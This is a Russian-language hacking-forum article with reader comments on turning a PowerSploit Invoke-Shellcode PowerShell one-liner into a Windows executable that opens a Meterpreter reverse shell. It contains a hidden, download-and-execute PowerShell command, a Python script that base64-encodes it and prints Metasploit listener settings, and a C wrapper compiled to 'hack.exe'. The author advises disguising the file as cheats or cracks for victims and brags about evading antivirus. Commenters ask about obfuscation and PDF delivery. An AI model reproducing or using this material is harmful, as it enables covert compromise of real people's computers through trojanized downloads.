Статья Powershell для хакера (часть II )

Часть 2
Предыдущая часть
Следующая часть
Все части

Приветствую вас колеги)

В прошлой статье мы научились использовать скрипты от PowerSploit для получение метерпретер сессии.

Но вынудить жертву открыть командную строку и вставить всю строку для PowerShell как вы поняли не очень легко,правда соц.инженерия делает чудеса,но все же попробуем упростить как можно больше этот процесс,процесс доставление до жертвы полезной нагрузки.

Этим мы сегодня и займемся.

Как по мне самый лучший способ доставлять жертве малварь в виде какого нибудь бинарника под предлогом какой то шары,толи это будет программа для взлома вк,толи читы на танки,толи кряк на антивирус - решать и фантазировать вам.

Давайте вспомним из прошлой статьи: https://codeby.net/threads/powershell-dlja-xakera-chast-i.58495/

нашу команду для PowerShell-а:
Код:
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force
Посмотрев на нее - мы можем заметить много спецсимволов,таких как кавычки,скобки,точка с запятой и т.д... Имхо такой вид не самый приемлемый как по мне.
По этому я накидал простенький скриптец который генерирует нам такую строку с base64 кодировкой и сразу же на вывод выведет нам команды для создание листенера в метасплоите.

Вот сюда я запостил если что:
https://codeby.net/threads/vashi-programmy-na-python.58124/#post-266525
Или могу прям сюда разшарить свой скриптец:
Python:
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-

import re
import base64
from termcolor import colored

def banner():
    print colored("""
===============================================================================

#####                          #######           #     #                  
#     #  ####  #####  #####     #     # ######    #     #   ##    ####  #    #
#       #    # #    # #    #    #     # #         #     #  #  #  #    # #   #
#       #    # #    # #    #    #     # #####     ####### #    # #      ####
#       #    # #####  #####     #     # #         #     # ###### #      #  #
#     # #    # #   #  #         #     # #         #     # #    # #    # #   #
#####   ####  #    # #         ####### #         #     # #    #  ####  #    #
                                                                           
           ____                             __  __      _        
          |  _ \ _____      _____ _ __     |  \/  | ___| |_ ___ _ __
          | |_) / _ \ \ /\ / / _ \ '__|____| |\/| |/ _ \ __/ _ \ '__|
          |  __/ (_) \ V  V /  __/ | |_____| |  | |  __/ ||  __/ |
          |_|   \___/ \_/\_/ \___|_|       |_|  |_|\___|\__\___|_|
                                                                 

Powershell_Meter script  is a PowerShell Command Generator.
Written by [Mister Bert0ni|DarkNode] <Corp Of Hack Team><Grey Team> <CodeBy Team>
[[Contacts]] ::: <https://new.vk.com/byhackers>
[[My Docs]] ::: <https://codeby.net/tags/darknode-tutorial/>
[[YouTube]]  ::: <https://www.youtube.com/c/CorpOfHack>
===============================================================================
""","cyan")
 
def powershell_encode(data):
    # blank command will store our fixed unicode variable
    blank_command = ""
    powershell_command = ""
    # Remove weird chars that could have been added by ISE
    n = re.compile(u'(\xef|\xbb|\xbf)')
    # loop through each character and insert null byte
    for char in (n.sub("", data)):
        # insert the nullbyte
        blank_command += char + "\x00"
    # assign powershell command as the new one
    powershell_command = blank_command
    # base64 encode the powershell command
    powershell_command = base64.b64encode(powershell_command)
    return powershell_command

def metasploit():
    print colored("[*]PowerShell генератор для Metasploit-Framework с ипользованиевм PowerSploit.","yellow")
    print colored("Оригинал можно взять здесь:","green")+ colored("https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1\n\n","cyan")
    ans_lhost = raw_input("Введите IP адрес атакующей машины(LHOST): ")
    ans_lport = raw_input("Введите Порт листенера атакуещей машины(LPORT): ")
 
    print colored("\n[*]Наша команда для PowerShell:","yellow")
    x = powershell_encode("IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost "+ans_lhost+" -Lport "+ans_lport+" -Force")
    print colored("powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc " + x,"red")
    print colored("\n[*]Команды для metasploit-framework(Вы можете сохранить эту последовательность команд в файл listener.rc и запустить msfconsole -r listener.rc или же прямо из запущеной консоли метаслоита: resourse listener.rc","yellow")
    print colored("use multi/handler \nset payload windows/meterpreter/reverse_https \nset LHOST " + ans_lhost + "\nset LPORT " + ans_lport + "\nset ExitOnSession false \nexploit -j","green")

banner()
metasploit()


Этот скрипт нас сгенерирует нужную строку.

1.PNG


2.PNG


3.PNG


4.PNG


Затем нам нужно впихнуть ее в бинарних. И хотелось бы конечно что бы он не детектился антивирусами) По дефолту он у меня показал .

Весьма не плохо как по мне) Ну а у кого параноя насчет фулл андетекта,то скажу что вероятность использования двух малоизвестных антивирусов, которые обнаружили малварь, не очень велика

Давайте соберем бинарник. Делается это очень просто:
Просто создадим соурс код на СИ (с) со следующим содержимым:
C:
#include <stdlib.h>

int main() {
    system("Наша_Команда_PowerShell_Тута...");
        return 0;
}
5.PNG

Соответственно где "Наша_Команда_PowerShell_Тута..." - копипастим нашу строку которую вернул нам наш скрипт.

7.PNG


Компилируем в exe файл командой:
Код:
i686-w64-mingw32-gcc -o hack.exe ~/test.c
8.PNG


Тестируем:

9.PNG
10.PNG


WindowsDefender не ругается, сессия прилетает. Давайте прогоним на детект антивирусами:

6.PNG


Вроде неплохо)

Всем спасибо) Продолжения следует)

Вот демо-видео :
Предыдущая часть
Следующая часть
Все части
 
вот досада =) На XP проверил - не пошло =( ХР на виртуалке, без АНТИвирусов и пр =)
 
Ну PowerShell идет по дефолту на системах от Windows 7 и выше)
[doublepost=1483801210,1483801062][/doublepost]
Приветствую вас колеги)
В прошлой статье мы научились использовать скрипты от PowerSploit для получение метерпретер сессии.
Но вынудить жертву открыть командную строку и вставить всю строку для PowerShell как вы поняли не очень легко,правда соц.инженерия делает чудеса,но все же попробуем упростить как можно больше этот процесс,процесс доставление до жертвы полезной нагрузки.
Этим мы сегодня и займемся.
Как по мне самый лучший способ доставлять жертве малварь в виде какого нибудь бинарника под предлогом какой то шары,толи это будет программа для взлома вк,толи читы на танки,толи кряк на антивирус - решать и фантазировать вам.
Давайте вспомним из прошлой статьи:
https://codeby.net/threads/powershell-dlja-xakera-chast-i.58495/
нашу команду для PowerShell-а:
***Скрытый текст***
Посмотрев на нее - мы можем заметить много спецсимволов,таких как кавычки,скобки,точка с запятой и т.д... Имхо такой вид не самый приемлемый как по мне.
По этому я накидал простенький скриптец который генерирует нам такую строку с base64 кодировкой и сразу же на вывод выведет нам команды для создание листенера в метасплоите.
Вот сюда я запостил если что:
***Скрытый текст***
Или могу прям сюда разшарить свой скриптец:
***Скрытый текст***

Этот скрипт нас сгенерирует нужную строку.
Посмотреть вложение 7952 Посмотреть вложение 7953 Посмотреть вложение 7954 Посмотреть вложение 7955
Затем нам нужно впихнуть ее в бинарних. И хотелось бы конечно что бы он не детектился антивирусами) По дефолту он у меня показал .
Весьма не плохо как по мне) Ну а у кого параноя насчет фулл андетекта,то скажу что вероятность использования двух малоизвестных антивирусов, которые обнаружили малварь, не очень велика
Давайте соберем бинарник. Делается это очень просто:
Просто создадим соурс код на СИ (с) со следующим содержимым:

C:
#include <stdlib.h>

int main() {
    system("Наша_Команда_PowerShell_Тута...");
        return 0;
}
Посмотреть вложение 7956
Соответственно где "Наша_Команда_PowerShell_Тута..." - копипастим нашу строку которую вернул нам наш скрипт.
Посмотреть вложение 7957
Компилируем в exe файл командой:

Код:
i686-w64-mingw32-gcc -o hack.exe ~/test.c
Посмотреть вложение 7958

Тестируем:
Посмотреть вложение 7959 Посмотреть вложение 7960

WindowsDefender не ругается, сессия прилетает. Давайте прогоним на детект антивирусами:
Посмотреть вложение 7961

Вроде неплохо)

Всем спасибо) Продолжения следует)

Вот демо-видео :
***Скрытый текст***
Интересные темы вы выкладываете, ещё было бы интересно почитать об интеграции Metasploit Framework в систему. К примеру уведомления об открытии сеанса Meterperter

5. Условия и правила создания тем и сообщений, размещение других информационных материалов (фото, видео)
***
7. Избыточное цитирование запрещено. Оставляйте только строки с теми словами или вопросами, на которые Вы собираетесь ответить.
 
Последнее редактирование модератором:
[doublepost=1483801210,1483801062][/doublepost]
Интересные темы вы выкладваете, ещё было бы интересно почитать о интеграции Metasploit Framework в систему. К примеру уведомления о открытии сеанса Meterperter
Не совсем понял вопрос|просьбу.
 
Ну знаете ли когда к примеру запустил exploit -j и пошел делать свои дела, не будешь же постоянно следить за терминалом. А хочется что бы через notify-send все высветилось
Есть голосовые оповещения в метасплоите . Notify-send вам не поможет если вы отойдете делать дела)
По возможности раскрою это в последующих постах
 
Огромное спасибо, даже не подозревал о подобном. Жду ваших новых постов, форум просто отличный!;)
 
  • Нравится
Реакции: BaJIepraH и <~DarkNode~>
Сразу извиняюсь, за глупый вопрос!
Скрипт power_meter я сохранил через idle phyton 2.7 в файл, но через терминал пишет что отказано в доступе, как открыть скрипт не подскажите пожалуйста?
 
Можно сделать всё тоже самое но запихнуть не в exe а в pdf файл. ?
 
Автор, прям респект. А не подскажешь как при компиляции запихнуть иконку и если можно паралельно еще выполнить какую либо команду. В программировании не бум-бум =). Заранее спасибо.
 
Извиняюсь за глупый вопрос - как запустить ваш скрипт для генерации строки ? Скопировать код,закинуть в среду разработки питон,подправить хост,порт и выполнить ?
 
текст скрипта под споллером..далее вы из его делаете питоновский файл.если вы его не видите значит вам нужно набрать определенное число симпатий, или сообщений.Активно участвуйте в жизни форума и будет вам счастье.
 
  • Нравится
Реакции: <~DarkNode~>
Скомпилил код(для теста перед кодом пш),палится неслабо,хоть и гавноав


Сам код
Код:
#include <stdlib.h>

int main() {
    system("powershell regedit");
        return 0;
}

Как убать лишнее палево?

Вместе с кодом пш результат


После обфускации аес


Везде вместо регедита код пш для мсф сессии
 
Странно но каспер стал отлдавливать такие вещи
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!